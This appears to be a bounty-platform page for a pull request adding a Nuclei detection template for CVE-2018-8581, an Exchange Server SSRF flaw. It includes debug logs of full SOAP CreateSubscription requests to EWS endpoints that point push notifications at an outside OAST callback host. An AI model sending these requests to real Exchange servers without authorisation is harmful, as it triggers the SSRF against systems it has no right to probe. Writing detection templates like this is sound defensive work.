PR
Feat/CVE 2018 8581
projectdiscovery/nuclei-templates#14954

This PR adds a high-fidelity Nuclei template for CVE-2018-8581, an elevation of privilege vulnerability in Microsoft Exchange Server. The template performs active validation by triggering an SSRF interaction via a Push Notification subscription request to the EWS endpoint.

Key Features:

Uses interactsh for reliable Out-of-Band (OAST) detection.

Implements strict matchers: Requires both a successful m:SubscribeResponse and an OAST interaction to prevent false positives.

Includes comprehensive metadata (CPE, CVSS, and Shodan queries).

/claim #14576

POST /EWS/Exchange.asmx HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Connection: close Content-Length: 835 Content-Type: text/xml; charset=utf-8 SOAPAction: “http://schemas.microsoft.com/exchange/services/2006/messages/CreateSubscription” Accept-Encoding: gzip

http://schemas.xmlsoap.org/soap/envelope/” xmlns:t=“http://schemas.microsoft.com/exchange/services/2006/types” xmlns:m=“http://schemas.microsoft.com/exchange/services/2006/messages"> soap:Header/ soap:Body NewMailEvent AQAAAFyXNzEjRqTzFE+TLoDSw9T+/w== 1 https://d5n7rpoppn62b618k7a0ip8c75c7hrwn4.oast.pro/ [DBG] [CVE-2018-8581] Dumped HTTP response https://example.com/EWS/Exchange.asmx

HTTP/1.1 405 Not Allowed Connection: close Transfer-Encoding: chunked Cf-Ray: 9c088a51cc78a70d-DEL Content-Type: text/html Date: Mon, 19 Jan 2026 18:54:23 GMT Server: cloudflare Vary: Accept-Encoding

<title>Example Domain</title><style>body{background:#eee;width:60vw;margin:15vh auto;font-family:system-ui,sans-serif}h1{font-size:1.5em}div{opacity:0.8}a:link,a:visited{color:#348}</style>

Example Domain

This domain is for use in documentation examples without needing permission. Avoid use in operations.

Learn more

[INF] [CVE-2018-8581] Dumped HTTP request for https://example.com/EWS/PushSubscription.svc

POST /EWS/PushSubscription.svc HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Connection: close Content-Length: 835 Content-Type: text/xml; charset=utf-8 SOAPAction: “http://schemas.microsoft.com/exchange/services/2006/messages/CreateSubscription” Accept-Encoding: gzip

http://schemas.xmlsoap.org/soap/envelope/” xmlns:t=“http://schemas.microsoft.com/exchange/services/2006/types” xmlns:m=“http://schemas.microsoft.com/exchange/services/2006/messages"> soap:Header/ soap:Body NewMailEvent AQAAAFyXNzEjRqTzFE+TLoDSw9T+/w== 1 https://d5n7rpoppn62b618k7a07ksubyz5dc7aa.oast.pro/ <title>Example Domain</title><style>body{background:#eee;width:60vw;margin:15vh auto;font-family:system-ui,sans-serif}h1{font-size:1.5em}div{opacity:0.8}a:link,a:visited{color:#348}</style>

Example Domain

This domain is for use in documentation examples without needing permission. Avoid use in operations.

Learn more

Claim

Total prize pool $100
Total paid $0
Status Pending
Submitted January 19, 2026
Last updated January 19, 2026

Contributors

KI

kingerharshit

@kingerharshit

 100%

Sponsors

PR

ProjectDiscovery

@projectdiscovery

$100